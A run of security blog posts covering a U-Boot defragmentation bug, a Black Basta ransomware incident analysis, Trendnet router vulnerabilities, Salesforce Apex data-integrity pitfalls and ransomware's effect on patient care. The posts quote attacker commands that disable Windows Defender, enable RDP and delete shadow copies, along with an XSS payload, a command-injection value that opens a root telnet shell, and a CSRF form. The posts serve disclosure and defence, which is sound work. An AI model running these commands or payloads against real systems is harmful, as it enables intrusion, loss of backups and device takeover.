	uchar *indata = (uchar *)ip;
	int offset8, start, len, done = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload starts after IP header, this fragment is in there */
	payload = (struct hole *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	start = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

The last line of the previous excerpt from u-boot/net/net.c shows where the underflow to a negative len value occurs if ip_len is set to a value strictly lower than 20 (IP_HDR_SIZE being 20). Also note that in the above excerpt the pkt_buff buffer has a size of CONFIG_NET_MAXDEFRAG which defaults to 16 KB but can range from 1KB to 64 KB depending on configurations.

	/* finally copy this fragment and possibly return whole packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

In the above excerpt the memcpy() overflows the destination by attempting to make a copy of nearly 4 gigabytes in a buffer that’s designed to hold CONFIG_NET_MAXDEFRAG bytes at most, which leads to a DoS.

Recommendation

This bug was disclosed to U-Boot support team and will be fixed in an upcoming patch. Update to the latest master branch version once the fix has been committed.

Disclosure Timeline

May 18th 2022: Initial e-mail from NCC to U-boot maintainers announcing two vulnerabilities were identified. U-Boot maintainers responded indicating that the disclosure process is to be handled publicly through U-Boot’s mailing list.

May 18th 2022: NCC posted a full writeup of the two vulnerabilities identified to U-Boot’s public mailing list.

May 25th 2022: a U-Boot maintainer indicated on the mailing list that they will implement a fix to the two findings.

May 26th 2022: a patch has been proposed by U-Boot maintainers to fix both CVEs through the mailing list.

May 31st 2022: U-boot maintainers and NCC Group agree to publishing the advisories in advance of patch deployment, given the public mailing-list-based discussion of the vulnerability and proposed fixes.

Thanks to

Jennifer Fernick, and Dave Goldsmith for their support through the disclosure process.

U-Boot’s maintainers.

Authors

Nicolas Guigo, and Nicolas Bidron

Shining the Light on Black Basta

Authored by: Ross Inman (@rdi_x64) and Peter Gurney

Summary

tl;dr

This blog post documents some of the TTPs employed by a threat actor group who were observed deploying Black Basta ransomware during a recent incident response engagement, as well as a breakdown of the executable file which performs the encryption.

A summary of the findings can be found below:

  • Lateral movement through use of Qakbot.
  • Gathering internal IP addresses of all hosts on the network.
  • Disabling Windows Defender.
  • Deleting Veeam backups from Hyper-V servers.
  • Use of WMI to push out the ransomware.
  • Technical analysis of the ransomware executable.

Black Basta

Black Basta are a ransomware group who have recently emerged, with the first public reports of attacks occurring in April this year. As is popular with other ransomware groups, Black Basta uses double-extortion attacks where data is first exfiltrated from the network before the ransomware is deployed. The threat actor then threatens to leak the data on the “Black Basta Blog” or “Basta News” Tor site. There are two Tor sites used by Black Basta, one which leaks stolen data and one which the victims can use to contact the ransomware operators. The latter site is provided in the ransom note which is dropped by the ransomware executable.

Black Basta TTPs

Lateral Movement

Black Basta was observed using the following methods to laterally move throughout the network after their initial access had been gained:

  • PsExec.exe which was created in the C:\Windows\ folder.
  • Qakbot was leveraged to remotely create a temporary service on a target host which was configured to execute a Qakbot DLL using regsvr32.exe:
    • regsvr32.exe -s \\<IP address of compromised Domain Controller>\SYSVOL\<random string>.dll
  • RDP along with the deployment of a batch file called rdp.bat which contained command lines to enable RDP logons. This was used to allow the threat actor to establish remote desktop sessions on compromised hosts, even if RDP was disabled originally:
    • reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
    • net start MpsSvc
    • netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
    • reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f

Defense Evasion

During the intrusion, steps were taken by the threat actor in order to prevent interference from anti-virus. The threat actor was observed using two main techniques to disable Windows Defender.

The first used the batch script d.bat which was deployed locally on compromised hosts and executed the following PowerShell commands:

  • powershell -ExecutionPolicy Bypass -command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"
  • powershell -ExecutionPolicy Bypass -command "Set-MpPreference -DisableRealtimeMonitoring 1"
  • powershell -ExecutionPolicy Bypass Uninstall-WindowsFeature -Name Windows-Defender

The second technique involved creating a GPO (Group Policy Object) on a compromised Domain Controller which would push out the below changes to the Windows Registry of domain-joined hosts:

Figure 1 Parsed Registry.pol of the created GPO

Discovery

A text file in the C:\Windows\ folder named pc_list.txt was present on two compromised Domain Controllers, both contained a list of internal IP addresses of all the systems on the network. This was to supply the threat actor with a list of IP addresses to target when deploying the ransomware. 

Command and Control

Qakbot was the primary method utilised by the threat actor to maintain their presence on the network. The threat actor was also observed using Cobalt Strike beacons during the compromise.

Impact

Prior to the deployment of the ransomware, the threat actor established RDP sessions to Hyper-V servers and from there modified configurations for the Veeam backup jobs and deleted the backups of the hosted virtual machines.

An encoded PowerShell command was observed on one of the compromised Domain Controllers which, when decoded, yielded a script labelled as Invoke-TotalExec that provided the ability to spread and execute files over the network using WMI (Windows Management Instrumentation). The script appears to have been run to push out the ransomware binary to the IP addresses contained within the file C:\Windows\pc_list.txt. Analysis of the script indicates that two log files are created:

  • C:\Windows\Temp\log.info – Contains log entries for successful attempts.
  • C:\Windows\Temp\log.dat – Contains log entries for unsuccessful attempts.

For the incident investigated by NCC Group CIRT, only the latter log file had data. The log file contained entries relating to failed uploads for all the IP addresses from pc_list.txt, indicating that the threat actor attempted to deploy the ransomware executable across all hosts on the network, however this had failed.  Despite this, the ransomware was still deployed to Hyper-V servers and the Domain Controllers.

Recommendations

  1. Hypervisors should be isolated by placing them in a separate domain or by adding them to a workgroup to ensure that any compromise in the domain in which the hosted virtual machines reside does not pose any risk to the Hypervisors.
  2. Ensure that both online and offline backups are taken and test the backup strategy regularly to identify any weak points that could be exploited by an adversary.
  3. Restrict internal RDP and SMB traffic ensuring only hosts that are required to communicate via these protocols are allowed to.

Indicators of Compromise

IOC Value Indicator Type Description
23.106.160[.]188 IP Address Cobalt Strike Command-and-Controller server
eb43350337138f2a77593c79cee1439217d02957 SHA1 Batch script which enabled RDP on the host (rdp.bat)  
920fe42b1bd69804080f904f0426ed784a8ebbc2 SHA1 Batch script to disable Windows Defender (d.bat)
C:\Windows\PsExec.exe Filename PsExec
C:\Windows\SYSVOL\sysvol\<random string>.dll Filename Qakbot payload
C:\Windows\Temp\log.info C:\Windows\Temp\log.dat Filename Invoke-TotalExec output log files

Ransomware Technical Analysis 

Shadow Copy Deletion 

Upon execution, Black Basta performs several operations before launching its encryption activities. 

The Mutex ‘dsajdhas.0’ is checked before issuing the two vssadmin.exe commands listed below. Although the Mutex is static in this sample it is expected to change across future samples. 

C:\\Windows\\SysNative\\vssadmin.exe delete shadows /all /quiet 
C:\\Windows\\System32\\vssadmin.exe delete shadows /all /quiet 

These result in the deletion of shadow copies ensuring they cannot be used for recovery purposes. 

Wallpaper icon modification 

Following deletion of the shadow copies, two files are obtained from the binary. Firstly, a JPG file in the currently analysed sample is saved as ‘dlaksjdoiwq.jpg’, used as a wallpaper on targeted devices. The image used can be seen below in Figure 2. 

Figure 2 Desktop wallpaper image 

The second dropped file is an icon file obtained from within the binary and used as a default icon for all files with extension. basta. The file is saved in the currently analysed sample with the name fkdjsadasd.ico within the %Temp% directory, for example:

C:\Users\{Username}\AppData\Local\Temp 

The icon used can be seen below in Figure 3. 

Figure 3 Basta icon 

The wallpaper is modified to display the dropped JPG through the registry located at HKCU\Control Panel\Desktop\Wallpaper, setting the path to the JPG as seen below in Figure 4.  

Figure 4 String de-obfuscation example 

The next operation creates a new registry key with the name .basta under HKEY_CLASSES_ROOT and sets the DefaultIcon subkey to display the dropped .ico file. This results in files given a .basta file extension inheriting the Black Basta logo. The registry key can be seen below in Figure 5. 

Figure 5 Desktop wallpaper image 

Ransom Note 

The ransomware note is stored within the binary and written to a text file named readme.txt, as shown in Figure 6. This file is written to folders throughout the system. The content comprises a standard Black Basta template with a URL to a Tor site where victims can negotiate with operators. 

A company ID is also present, which varies between compromises. 

Figure 6 Ransom Note 

Exclusions 

In an attempt to avoid encrypting files or folders that are likely essential to the operation of the target machine or Black Basta itself, several exclusions are in place that will prevent encrypting specific files. This includes several extensions, folders and files listed below. 

Extension exclusions: 

  • exe 
  • cmd 
  • bat 
  • com 
  • bat 
  • basta 

File Folder exclusions: 

  • $Recycle.Bin 
  • Windows 
  • Documents and Settings 
  • Local Settings 
  • Application Data
  • OUT.txt
  • Boot
  • Readme.txt
  • Dlaksjdoiwq.jpg
  • NTUSER.DAT
  • fkdjsadasd.iso

A copy of the ransom note is placed where an eligible folder is found, and suitable files discovered within the folder are passed for encryption. 

Encryption 

Several threads are created that are responsible for performing the encryption activity. Each file that is not skipped by the previously mentioned exclusions is encrypted using the ChaCha20 cypher. 

The encryption key is generated using the C++ rand_s function resulting in a random 40-byte hexadecimal output.  

Figure 7 Random generation output 

The first 32 bytes are used as the ChaCha20 encryption key. 

Figure 8 Encryption key 

The last 8 bytes are used as the ChaCha20 nonce. 

Figure 9 Nonce 

The encryption key is encrypted using an implementation of RSA provided through the Mini GMP library. A public key is obtained from the binary that results in an output similar to the below output in Figure 10. 

Figure 10 Encrypted encryption key 

Black Basta, as with many ransomware variants, doesn’t encrypt the entire file, instead only partially encrypts the file to increase the speed and efficiency of encryption. Black Basta achieves this by only encrypting 64-byte blocks of a file interspaced by 128-bytes. This can be seen in Figure 11 below, where the first two encrypted data blocks are shown.  

Figure 11 Example encrypted file 

To further demonstrate this, an unencrypted version of the file can be seen below in Figure 12. 

Figure 12 Example of the unencrypted file 

Finally, the earlier generated RSA encrypted key and 0x00020000 are appended to the end of the file, which would be used for decryption purposes. 

Figure 13 appended encrypted key and hex 

Following successful encryption of a file, its extension is changed to .basta which automatically adjusts its icon to the earlier drop icon file. An example of what a victim would be presented with can be seen below in Figure 14. 

Figure 14 example post encrypted desktop 

While the ransom note threatens victims with the publication of data if the ransom is not met, initial analysis has not uncovered a mechanism for exfiltration. With access to the private key counterpart of the public key used earlier, recovery of the ChaCha20 encryption key by operators should be possible allowing for file decryption. No weakness in the encryption was discovered during analysis that would provide an opportunity for decryption without the private RSA key. 

Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)

10 June 2022 at 18:29

The Trendnet TEW-831DR WiFi Router was found to have multiple vulnerabilities exposing the owners of the router to potential intrusion of their local WiFi network and possible takeover of the device.

Five vulnerabilities were discovered. Below are links to the associated technical advisories:

Technical Advisories:

Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)

Vendor: Trendnet
Vendor URL: https://www.trendnet.com/
Versions affected: All Versions
System Affected: TEW-831DR
CVE Identifier: CVE-2022-30326
Severity: Medium 5.0

Summary

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the network pre-shared key field on the web interface is vulnerable to XSS.

Impact

An attacker can use a simple XSS payload to crash the main page of the router web interface.

Details

Stored XSS is a vulnerability related to improper validation of user input and output. In stored XSS the web interface accepts input from the user and stores it for later without proper encoding. A web application that is vulnerable to XSS allows an attacker to send a malicious script to the user.

The example below will crash the basic_conf page and create a popup on the 5G home.htm page:

<input type="text" name="pskValue0" id="pskValue0" size="30" maxlength="64" value="<script>alert(1)</script>">

Recommendation

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)

Vendor: Trendnet
Vendor URL: https://www.trendnet.com/
Versions affected: All Versions
System Affected: TEW-831DR
CVE Identifier: CVE-2022-30328
Severity: Medium 4.0

Summary

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the router web interface has an insecure username and password setup.

Impact

A malicious user can change the username and password of the interface.

Details

The username and password setup for the router web interface does not require entering the existing password. An attacker can use CSRF to trick the user to send a request to the web interface to change the username and password of the router.

Recommendation

Trendnet indicated that this CVE will not be fixed at this point. Router owners should logout of the device web interface after use.

OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)

Vendor: Trendnet
Vendor URL: https://www.trendnet.com/
Versions affected: All Versions
System Affected: TEW-831DR
CVE Identifier: CVE-2022-30329
Severity: Medium 6.3

Summary

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that commands could be injected into the diagnostics field within the web interface.

Impact

An OS injection vulnerability was found within the web interface of the device allowing an attacker with valid credentials to execute arbitrary shell commands.

Details

The web interface has a diagnostics page that uses ping/traceroute. In the host(domain) an attacker can enter an IP with a ; at the end and inject a command to be executed by the device. Using command injection telnetd can be enabled. Telnetd is a remote terminal protocol server.

For example, the following can be entered into the host(domain) to enable telnetd:

192.168.10.02;telnetd &

After running the command, any telnet client can be used to login to the root account from the local area network (LAN):

user: root
Password: the admin password 

Running the ls command will list the files in the current directory:

bin   etc   init  mnt   root  tmp   var
dev   home  lib   proc  sys   usr   web

Recommendation

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)

Vendor: Trendnet
Vendor URL: https://www.trendnet.com/
Versions affected: All Versions
System Affected: TEW-831DR
CVE Identifier: CVE-2022-30327
Severity: High 7.6

Summary

Trendnet TEW-831DR WiFi router is a general consumer WiFi router with a web interface for configuration. It was found that the routers browser interface is vulnerable to CSRF.

Impact

The WiFi router interface is vulnerable to CSRF. An attacker can change the pre-shared key to the WiFi router if the interface IP is known.

Details

Cross-Site Request Forgery is an attack that occurs when a user interacts with a malicious web application while logged into a vulnerable web application using the same browser. The malicious web application can send unwanted requests to the vulnerable web application.

If the user is logged into the router web interface an attacker could create a page like the example below and trick a user into clicking it to change the router WiFi pre-shared key or SSID.

e.g.:

<html>
  <!-- CSRF Template -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.10.1/boafrm/formWizard" method="POST">

      <input type="hidden" name="pskValue0" value="password" />
      <input type="hidden" name="pskValue1" value="password" />
      <input type="hidden" name="cliPskValue0" value="password" />
      <input type="hidden" name="cliPskValue1" value="password" />
      <input type="hidden" name="apply" value="Save &amp; Apply" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Recommendation

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)

Vendor: Trendnet
Vendor URL: https://www.trendnet.com/
Versions affected: All Versions
System Affected: TEW-831DR
CVE Identifier: CVE-2022-30325
Severity: Medium 4.0

Summary

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the default pre-shared key for the WiFi networks is the same for every router but the last four digits.

Impact

The device default pre-shared key for both 2.4GHz and 5GHz networks can be guessed or brute-forced by an attacker within range of the WiFi network. The weak pre-shared key allows the attacker to gain access to these networks if the pre-shared key has been left unchanged from the factory default.

Details

The device default pre-shared key has the same seven out of eleven digits for every router. An attacker within scanning range of the WiFi network can brute-force the last four digits to gain access to the network.

e.g.:

The first seven default characters of the pre-shared key:
831R100

Recommendation

Trendnet indicated that this CVE will not be fixed at this point. Router owners that are still using the default pre-shared key should update the current wifi key to new one through the web interface.

Disclosure Timeline:

March 15th, 2022: Initial email from NCC to Trendnet.

March 16th, 2022: Trendnet responded to the initial email.

March 18th, 2022: First communication of the bugs to Trendnet. Set the disclosure timeline to 60 days.

May 5th – May 23rd, 2022: Multiple emails exchanged to complete the fixes on the firmware version.

May 23rd, 2022: Trendnet confirmed the fixes were present in the firmware to be released.

June 2nd, 2022 – Trendnet released firmware version:v1.0(601.130.1.1410).

Thanks to

Nicolas Bidron, Jennifer Fernick, and David Goldsmith for their support throughout the research and disclosure process. Additionally, Trendnet for their on going cooperation.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Exception Handling and Data Integrity in Salesforce

14 June 2022 at 20:09

Robust exception handling is one of the tenets of best practice for development, no matter what the coding language. This blog post explores the curious circumstances in which a developer trying to do the right thing – but without appreciating the full effects – could lead to data integrity issues in a Salesforce Organization. As we’ll explore, the precise impact will vary according to what’s being done to which data, but the potential for consequences detrimental to security is clear.

The Salesforce platform tries to ensure data integrity by having an automatic rollback mechanism, delimited by the common database concept of a ‘transaction’. However, as is so often the case, the devil is in the detail. On the basis of recent code reviews, it is apparently under-appreciated how the addition of exception handling in Apex (the Salesforce development language) can affect the rollback mechanism, which in turn can affect data integrity. There have been a couple of notable articles on this subject in the past [1] as well as discussions on forum sites, but the treatment has been relatively light. After checking various permutations on a test Organization, this article qualifies and expands on existing material in this space, highlighting the potential consequences for security on top of more functional side effects. In other words, while the condition is not new, its impact as a security vulnerability is explored. It’s important to understand that this is not a vulnerability in the Salesforce platform itself but a bug that could arise during custom development whose impact may extend to security.

Background

The Data Manipulation Language (DML) is essentially the subset of Apex that allows access to the database, including write operations that SOQL (the Salesforce Object Query Language) doesn’t support. There are two ways to use DML: executing DML ‘statements’ or calling Database class methods. By way of example, the following two lines are equivalent:

1.  insert newAccounts;
2.  Database.insert(newAccounts);

Both ways accept a single sObject or, as the above examples imply, a List of sObjects. So what’s the difference? For one thing, using a Database class method (line 2) allows a finer degree of control for bulk operations: an optional allOrNone Boolean parameter governs whether processing should stop if an error is encountered [2]. The default value of this parameter is true, which means that a database error stops the processing of further sObjects in the List before an exception is thrown. This mode mirrors how a DML statement handles an error when working on a List. If allOrNone is explicitly set to false, partial processing is allowed: if an error occurs, the remaining work is still given a chance to complete. In addition, instead of throwing exceptions, a result object (or an array of them if a List is passed) is returned containing the status of each operation and any errors encountered. This allows the caller to inspect the results and handle any failures appropriately [3].

As mentioned in the opening remarks, Salesforce has the concept of a ‘transaction’ – a collection of database operations through a code path that has a definite start and end point. A classic example would be a call to an Aura endpoint by a client-side Lightning Component, where the start point would be the entry into the @AuraEnabled method and the end point would be its exit through the final return. In between, any number of other methods from any number of other classes could be called, and the collection of DML operations along the way would constitute this particular transaction. Salesforce documentation explains that:

…all changes are committed to the database only after all operations in the transaction finish executing and don’t cause any errors. [4]

While true in one sense, it doesn’t capture the full range of outcomes and how conditions can arise that may cause data integrity issues [5].

Risks to Data Integrity

Setting the allOrNone parameter to false in a call to a Database method is not accidental: it can be assumed that the caller wants partial processing. But a less obvious risk to data integrity can emerge when an exception is thrown within a try block after one or more DML operations have occurred, whether in the same try block or anywhere earlier in the transaction stack. The crucial point about automatic rollback is that it occurs after unhandled exceptions. But if the exception is caught [6], it is assumed the catcher knows what they are doing! If the catch block doesn’t explicitly handle any previous DML operations, those database changes will be committed – unless, of course, a new exception is thrown that either remains unhandled or is caught further up the stack where the database state is restored.

Reflecting on this, it’s relatively easy for a developer to write code that unintentionally makes a partial set of database changes under certain error conditions. This is like calling a Database method and setting allOrNone to false accidentally! The impact is obviously context-dependent, but it’s conceivable that the resulting state could have security implications.

Published examples in this area tend to have a DML operation as the cause of the exception, with a prior database operation being the problem to clean up. But an important point to highlight is that the exception need not relate to DML. Consider the following ‘proof-of-concept’ code:

// set up chgAccounts, a List of Accounts to update
try {
   update chgAccounts;   // need not be in this (or any) try block to be affected
   Account acc = [SELECT Name FROM Account WHERE Name = 'Acme'];
   // do something with acc, and maybe some other risky things
}
catch (Exception e) {}

Imagine one day that the Acme Account doesn’t exist anymore. Following the update, a System.QueryException is thrown because there is nothing to assign to the variable acc. Because the exception is caught (although ignored) the Account updates will be committed to the database. Note, as per the comment, that the update could be anywhere in the previous transaction path. This example also shows how the general bad practice of having empty catch blocks can have a specific consequence unique to Salesforce. However, even a valiant attempt at exception handling can still lead to data integrity problems if this specific aspect hasn’t been fully considered by the developer.

Whether the Account updates in the above case will have security implications, or indeed any kind of impact, will depend on the context. Let’s briefly consider a different scenario to illustrate a security risk. Imagine that custom code creates a new User during registration but, later in the transaction, an exception is raised and caught because a business logic check fails. Without adequate handling, the new user will still be created, and therefore the registrant could log in, contrary to business rules.

Finally, a particular use of the Database class is also worth calling out, whether it’s in a try block or not. Consider this single DML operation:

Database.update(newAccount, false);

Although the allOrNone parameter indicates that partial record processing is allowed, this method of database access will never throw exceptions and, in this example, the return values are effectively discarded. Therefore the caller has no idea of the success/failure status, whether a single sObject has been passed or a List. This may be acceptable in some cases, but it should be verified as such.

Recommendations

Any code path that includes a DML operation should be evaluated in full because a data integrity vulnerability could arise from an exception being caught at any point. Where custom exception handling is implemented, consider if any database changes earlier in the transaction need to be reverted manually. It is important to remember that catching an exception of any kind (not just one related to DML) could lead to a vulnerable condition. Clearly, using DML operations to reverse database changes should be avoided, since these too could raise exceptions, and round we go again. Instead, Salesforce supports a convenient ‘savepoint’ and ‘rollback’ mechanism [7].

If partial record processing is used explicitly, it is imperative that the return values from the particular Database method are captured, inspected and handled appropriately [8], using a format such as:

Database.SaveResult[] results = Database.insert(mySObjects, false);
for (Database.SaveResult result : results) {
   // check result.isSuccess() etc.
}

While potentially vulnerable conditions can be relatively simple to spot in a single method or class, remember that a transaction spans the life of a particular execution path. Therefore, establishing whether a vulnerability exists, and its resulting impact, can involve traversing back up that path. Even an exception thrown outside a try block could still lead to a data integrity issue if it’s caught further up the stack. For these reasons, an exhaustive search for this kind of vulnerability is likely beyond the remit of most manual code reviews because of time constraints and the complexity of analysis [9].

In Summary

This article aims to raise awareness of a particular kind of Apex vulnerability. In truth, while the necessary conditions may be common, perhaps more common than previously realised, instances of an exploitable vulnerability with a tangible benefit to an attacker will be rarer. Functional side effects, or simply an ‘untidy’ database, are a more likely result, but which are nevertheless unwanted and best avoided. It all depends on the context, though, and exploitable attack opportunities leveraging this condition may well exist out there. Through articles such as this, hopefully developers and code reviewers alike will be better able to find them.

Jerome Smith @exploresecurity

(thanks to Viktor Gazdag @wucpi for proof-reading)

Notes

[1] For example, https://medium.com/elevate-salesforce/apex-transaction-control-a-dml-case-study-c4b535825205 and https://www.crmscience.com/single-post/2020/05/20/how-salesforce-developers-handle-errors-with-try-catch-rollback-best-practices.
[2] https://developer.salesforce.com/docs/atlas.en-us.apexref.meta/apexref/apex_methods_system_database.htm
[3] https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/langCon_apex_dml_database.htm
[4] https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/langCon_apex_dml_transactions.htm
[5] This is why I have so far avoided the term ‘atomic’ – either everything completes or no changes are made – when talking about a transaction. In contrast, a single DML statement, or a Database method call with allOrNone missing or true, will process a List of sObjects in a truly atomic fashion: one failure will cause all changes made to the preceding records in the List to be reverted before an exception is thrown.
[6] Occasionally, system exceptions cannot be caught. One example is System.LimitException, which is raised when ‘governor limits’ are exceeded. If this exception is thrown, even within a try block, automatic rollback will follow because an unhandled error has been thrown. More information at https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/langCon_apex_dml_examples.htm and https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/apex_exception_statements.htm.
[7] https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/langCon_apex_transaction_control.htm
[8] https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/langCon_apex_dml_database_error.htm
[9] This is potentially something that static analysis tools could do, however. The current capability of Apex analysers has not been investigated during the research for this article.

Public Report – Threshold ECDSA Cryptography Review

15 June 2022 at 18:04

In March 2022, DFINITY engaged NCC Group to conduct a security and cryptography review of a threshold ECDSA implementation, which follows a novel approach described in the reference paper entitled “Design and analysis of a distributed ECDSA signing service” and available on the IACR ePrint archive at https://eprint.iacr.org/2022/506. The threshold ECDSA protocol will be deployed into the architecture of the Internet Computer. The ability for canisters to perform threshold signature generation and verification will facilitate the integration of the Internet Computer with other blockchains using ECDSA signatures, including Bitcoin and Ethereum.

The project methodology primarily relied upon manual code review supported by dynamic interaction with the test cases, as well as review of the supporting reference paper. Following this review, in early May 2022, NCC Group performed a retest of the findings uncovered during the initial engagement. That follow-up engagement also included the review of a short pull request incorporating changes to the underlying encryption scheme.

The Public Report for this review may be downloaded below:

Understanding the Impact of Ransomware on Patient Outcomes – Do We Know Enough?

16 June 2022 at 08:15

The healthcare sector and ransomware attacks appear together frequently in the media. Since before the start of the pandemic rarely a week goes by without at least one story about a healthcare organisation falling victim to a ransomware attack. We often hear about the financial impact these attacks have or how they can affect patient safety, but there is little to state what the actual impact on patient outcomes are. 

Articles about a ransomware attack that could be found to be the cause of a death, or vulnerabilities in a specific medical device are very important in bringing these issues into the public eye. However, they do not explain or even truly allude to where clinical risk is negatively impacted the most and that is what should ultimately be the priority when discussing cyberattacks in healthcare.

According to statistics obtained from publications produced by the European Union Agency for Cybersecurity (ENISA) and the FBI’s Internet Crime Complaint Center (IC3), ransomware attacks since 2017 have increased in general year on year (apart from 2018, where attacks decreased compared to the previous year). This could be attributed to several reasons such as the growth of ransomware, widespread vulnerabilities affecting a multitude of organisations, and of course the pandemic contributing to a decrease in user vigilance and expanding the security boundaries of organisations. [1] [2] [3] [4] [5] [6] [7] [8] [9] 

IC3 Annual Report Data

Contradicting the trend is the UK, according to the annual Cyber Security Breaches Surveys the percentage of breaches caused by ransomware attacks across all sectors have been steadily decreasing. However, ransomware remains one of the top three threats to UK businesses and charities. [10] [11] [12] [13] [14]

UK Cyber Security Breaches Survey Data

Although these statistics are not just about ransomware in the healthcare sector, the IC3 report from 2021 [11] shows that the healthcare and public health sector reported the most ransomware attacks. The number of healthcare organisations that reported being a victim of a ransomware attack was 148, this was significantly more than the next sector on the list, financial services, this being 89 organisations. A survey conducted by Sophos [15] stated that from 328 respondents 34% of organisations were hit by ransomware in the previous year (2020).

Similarly, the ENISA Threat Landscape 2020 [3] states “Healthcare organisations were the favourite target of ransomware attackers during all of the previous years, and this trend also continued in 2019.”

This would indicate that the healthcare sector remains a viable target as many organisations in this sector are considered soft targets. Furthermore, healthcare organisations are more likely to pay the ransom. [16]

Regardless of the fall or rise in the number of victims of ransomware, the continued attacks on the healthcare sector demonstrate callous behaviour towards patients’ wellbeing, the medical professionals and support staff of the healthcare organisations caring for those patients. 

Current research on the impact of ransomware attacks on patient health 

Ransomware attacks in healthcare environments can lock medical professionals out of workstations, disrupt access to services, prevent access to patient records, disable medical devices and prevent delivery of urgent care. With so many attacks occurring in the healthcare sector, the impact this has on patient outcomes could be disastrous, and even lead to death in extreme cases. 

When discussing the impact that ransomware has on patient outcomes it is important to consider all circumstances and not just the most critical cases, although these should clearly be prioritised. A search using phrases such as “ransomware impact patient” and “ransomware impact health” was used on Google scholar, PubMed, ProQuest, and general searches using Google and Bing to try and find any related research that had already been conducted and could shed some light on how ransomware impacts patient outcomes. 

Although the literary search was not exhaustive it appears this topic has not been thoroughly researched. Only a few contained conclusions as to whether a ransomware attack did in fact have a negative effect on patient outcomes. Furthermore, the results were inconsistent which in likelihood reflects the complex nature of healthcare environments but could also indicate more detailed research and analysis is required. 

Direct impact 

One of the most notorious incidents in recent years is that of the ransomware attack on a university hospital in Düsseldorf, Germany. Whilst enroute with a 78-year-old woman in a deteriorating state, paramedics were redirected to an alternative hospital 32 kilometres away due to systems being unavailable from the attack. The delay in treatment caused by the additional transfer time was initially suspected to have contributed to the patient’s death. However, the investigation later found that the patient’s condition was so severe at the time she was picked up that “The delay was of no relevance to the final outcome,” as reported by Wired [17]. 

Another incident occurred in 2019, in which an infant died at a hospital that was in the midst of a ransomware attack. The lawsuit states “Because numerous electronic systems were compromised by the cyberattack, fetal tracing information was not accessible at the nurses’ station or by any physician or other healthcare provider who was not physically present in Teiranni’s labor and delivery room. As a result, the number of healthcare providers who would normally monitor her labor and delivery was substantially reduced and important safety-critical layers of redundancy were eliminated.” [18]. 

Whilst the tragedy of these cases should not be understated, they only account for a small part of the overall effect that ransomware or any IT/OT outage could have in a healthcare environment. 

Rerouting 

A retrospective analysis was conducted after a successful ransomware attack on a health system in Southern California sent a large influx of patients to two emergency departments at the University of California San Diego. The increase in demand for care was above any expected increase from other situations such as flu season however, the analysis did not involve determining the impact on patient outcomes. [19] [20] 

Whilst this is not linked to ransomware it highlights that delay in care can have a negative impact on patient outcomes. Analysis of Medicare data [21] relating to patients suffering from a heart attack concluded that delays in ambulance journeys due to road closures (in this instance because of a marathon taking place) increased the 30-day mortality rate (a death occurring within 30 days of a defined event).

Remediation effects 

A research paper on the effect a data breach has on patient outcomes determined that “Hospital data breaches significantly increased the 30-day mortality rate for AMI” (AMI – Acute Myocardial Infarction, also known as a heart attack). The researchers also stated that “Ransomware attacks are considered to be more disruptive to hospital operations than the breaches considered in this study… If disruption to information technology used by providers is driving the breach effect, the findings from our study suggest that ransomware attacks may have an even stronger negative impact on patients than the breaches studied in this paper.” [22]. The researchers suggest that the changes to health information technology (HIT) as well as new policies and procedures following a data breach contribute to the increase in 30-day mortality and the longevity of the impact. 

The CyberPeace Institute released a report [23] in March 2021 that references research conducted at Vanderbilt University. Similar to the previous paper, this research discovered that remediation efforts following a data breach caused an increase in the 30-day mortality rate of patients suffering from a heart attack up to 3 years after the initial breach. 

Large scale attacks 

